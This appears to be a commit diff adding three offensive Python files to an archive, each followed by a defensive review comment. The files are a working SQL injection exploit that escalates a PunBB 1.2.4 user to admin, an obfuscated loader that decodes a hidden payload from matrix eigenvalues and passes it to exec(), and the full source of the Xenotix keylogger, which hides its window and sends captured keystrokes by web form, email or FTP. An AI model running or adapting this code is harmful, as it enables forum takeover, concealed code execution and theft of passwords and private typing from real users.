@@ -0,0 +1,130 @@
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import urllib
import getopt
import sys
import string
__argv__ = sys.argv
def banner():
print "PunBB 1.2.4 - change_email SQL injection exploit"
print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage():
banner()
print "Usage:\n"
print " $ ./punbb_change_email.py [options]\n"
print " -h http_url url of the punBB forum to exploit"
print " f.e. http://www.forum.net/punBB/"
print " -u username punBB forum useraccount"
print " -p password punBB forum userpassword"
print " -e email email address where the admin leve activation email is sent"
print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails"
print ""
sys.exit(-1)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
except getopt.GetoptError:
usage()
if len(__argv__) < 10:
usage()
username = None
password = None
email = None
domain = None
host = None
for o, arg in opts:
if o == "-h":
host = arg
if o == "-u":
username = arg
if o == "-p":
password = arg
if o == "-e":
email = arg
if o == "-d":
domain = arg
# Printout banner
banner()
# Check if everything we need is there
if host == None:
print "[-] need a host to connect to"
sys.exit(-1)
if username == None:
print "[-] username needed to continue"
sys.exit(-1)
if password == None:
print "[-] password needed to continue"
sys.exit(-1)
if email == None:
print "[-] email address needed to continue"
sys.exit(-1)
if domain == None:
print "[-] catch all domain needed to continue"
sys.exit(-1)
# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}
wclient = urllib.URLopener()
print "[+] Connecting to retrieve cookie"
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
params = {
'req_new_email' : email,
'form_sent' : 1
}
print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if __name__ == "__main__":
main()
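Review bot: The header states the lesson (`user-supplied data within the database is still user-supplied data`) but the file never says where a defender should look or what the forum-side fix is. I would add a comment such as `# Affects PunBB 1.2.4 change_email; fix: escape or parameterise the stored e-mail wherever it is reused in SQL, and validate address syntax on input` (the header wording suggests a second-order injection, which should be confirmed against the PunBB source). For log review, the request built in `main()` is a POST to `profile.php?action=change_email&id=<user_id>` whose `req_new_email` value contains quote characters, a comma, a run of padding spaces and the literal `group_id=`, none of which occur in a normal address.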
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
BIN
Binary file not shown.
BIN
Binary file not shown.
+98
@@ -0,0 +1,98 @@
def root3(num):
fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
a=num**(1/3.0)
b=a*fak1
c=a*fak2
return([a,b,c])
def getPQ(a,b,c):
p = b-((a**2)/3.0)
q = c + ((2*(a**3)-9*a*b)/27.0)
return([p,q])
def getU(p,q):
u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
return(root3(u3))
def getLambda(a,p,u):
if u[0] == 0:
L0=u[0] - a/3.0
else:
L0=u[0] - p/(3.0*u[0]) - a/3.0
if u[1] == 0:
L1=-a/3.0
else:
L1=u[1] - p/(3.0*u[1]) - a/3.0
if u[2] == 0:
L2=-a/3.0
else:
L2=u[2] - p/(3.0*u[2]) - a/3.0
return(L0,L1,L2)
def getABC(mtx):
a=-(mtx[0]+mtx[4]+mtx[8])
b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
return([a,b,c])
def eigenvalues(mtx):
ABC=getABC(mtx)
PQ=getPQ(ABC[0],ABC[1],ABC[2])
U=getU(PQ[0],PQ[1])
L=getLambda(ABC[0],PQ[0],U)
return(L)
def getstring(M):
str=''
for c in range(len(M)):
mLD=eigenvalues(M[c])
for i in range(len(mLD)+1):
for n in range(len(mLD)):
if round(mLD[n].imag)==i:
str+=chr(int(round(mLD[n].real)))
return(str)
M=[]
M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),])
M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),])
M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),])
M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),])
M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),])
M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),])
M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),])
M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),])
M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),])
M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),])
M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),])
M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),])
M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),])
M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),])
M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),])
M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),])
M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),])
M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),])
M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),])
M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),])
M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),])
M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),])
M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),])
M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),])
M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),])
M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),])
M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),])
M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),])
M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),])
M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),])
M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),])
M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),])
M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),])
M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),])
M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),])
myMTXcode=getstring(M)
exec(myMTXcode)
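Review bot: The final `exec(myMTXcode)` runs a string that appears nowhere in this file in readable form, so the commit cannot be reviewed for what it actually executes. `getstring(M)` rebuilds that string from the eigenvalues of each nine-element matrix: the rounded real part of an eigenvalue becomes the character code, and the rounded imaginary part (compared against 0 to 3) fixes its order within the matrix. For triage the last line should be `print(repr(myMTXcode))`, run in an isolated analysis environment, and a header comment such as `# decodes a hidden Python payload from matrix eigenvalues and exec()s it` would tell readers of the archive what the file is. Static scanners will not see the payload text here, so detection is better keyed on the exec-of-a-computed-string pattern than on content signatures.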
+210
@@ -0,0 +1,210 @@
'''
Xenotix Python Keylogger for Windows
====================================
Coded By: Ajin Abraham <ajin25@gmail.com>
Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
FEATURES
========
1.STORE LOGS LOCALLY
2.SEND LOGS TO GOOGLE FORMS
3.SEND LOGS TO EMAIL
4.SEND LOGS TO FTP
MINIMUM REQUIREMENTS
===================
Python 2.7: http://www.python.org/getit/
pyHook Module: http://sourceforge.net/projects/pyhook/
pyrhoncom Module: http://sourceforge.net/projects/pywin32/
pyHook Module -
Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
'''
try:
import pythoncom, pyHook
except:
print "Please Install pythoncom and pyHook modules"
exit(0)
import os
import sys
import threading
import urllib,urllib2
import smtplib
import ftplib
import datetime,time
import win32event, win32api, winerror
#Disallowing Multiple Instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "Multiple Instance not Allowed"
exit(0)
x=''
data=''
count=0
#Hide Console
def hide():
import win32console,win32gui
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window,0)
return True
def msg():
print """Xenotix Python Keylogger for Windows
Coder: Ajin Abraham <ajin25@gmail.com>
OPENSECURITY.IN
usage:xenotix_python_logger.py mode
mode:
local: store the logs in a file [keylogs.txt]
remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
"""
return True
#Local Keylogger
def local():
global data
if len(data)>100:
fp=open("keylogs.txt","a")
fp.write(data)
fp.close()
data=''
return True
#Remote Google Form logs post
def remote():
global data
if len(data)>100:
url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
try:
dataenc=urllib.urlencode(klog)
req=urllib2.Request(url,dataenc)
response=urllib2.urlopen(req)
data=''
except Exception as e:
print e
return True
#Email Logs
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>100:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com" #Specify Server Here
PORT = 587 #Specify Port Here
USER="your_email@gmail.com"#Specify Username Here
PASS="password_here"#Specify Password Here
FROM = USER#From address is taken from username
TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
SUBJECT = "Keylogger data: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
#Upload logs to FTP account
def ftp():
global data,count
if len(data)>100:
count+=1
FILENAME="logs-"+str(count)+".txt"
fp=open(FILENAME,"a")
fp.write(data)
fp.close()
data=''
try:
SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
USERNAME="ftp_username" #Specify your FTP Username
PASSWORD="ftp_password" #Specify your FTP Password
SSL=0 #Set 1 for SSL and 0 for normal connection
OUTPUT_DIR="/" #Specify output directory here
if SSL==0:
ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
elif SSL==1:
ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
ft.cwd(OUTPUT_DIR)
fp=open(FILENAME,'rb')
cmd= 'STOR' +' '+FILENAME
ft.storbinary(cmd,fp)
ft.quit()
fp.close()
os.remove(FILENAME)
except Exception as e:
print e
return True
def main():
global x
if len(sys.argv)==1:
msg()
exit(0)
else:
if sys.argv[1]=="local":
x=1
hide()
elif sys.argv[1]=="remote":
x=2
hide()
elif sys.argv[1]=="email":
hide()
email=TimerClass()
email.start()
elif sys.argv[1]=="ftp":
x=4
hide()
else:
msg()
exit(0)
return True
main()
def keypressed(event):
global x,data
if event.Ascii==13:
keys='<ENTER>'
elif event.Ascii==8:
keys='<BACK SPACE>'
elif event.Ascii==9:
keys='<TAB>'
else:
keys=chr(event.Ascii)
data=data+keys
if x==1:
local()
elif x==2:
remote()
elif x==4:
ftp()
obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard()
pythoncom.PumpMessages()
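Review bot: This sample is added without an analyst header, so the artefacts a defender would search for are scattered through the file rather than stated up front. I would add a comment above the docstring along the lines of `# Indicators: mutex 'mutex_var_xboz'; files keylogs.txt and logs-<n>.txt in the working directory; mail subject prefix "Keylogger data: "`. Behaviourally, the script hides its console with `win32gui.ShowWindow(window,0)` and installs a global keyboard hook through `obj.HookKeyboard()` followed by `pythoncom.PumpMessages()`, which is what endpoint telemetry would observe. The server, account and form values in `remote`, `TimerClass.run` and `ftp` are template placeholders and should not be recorded as indicators.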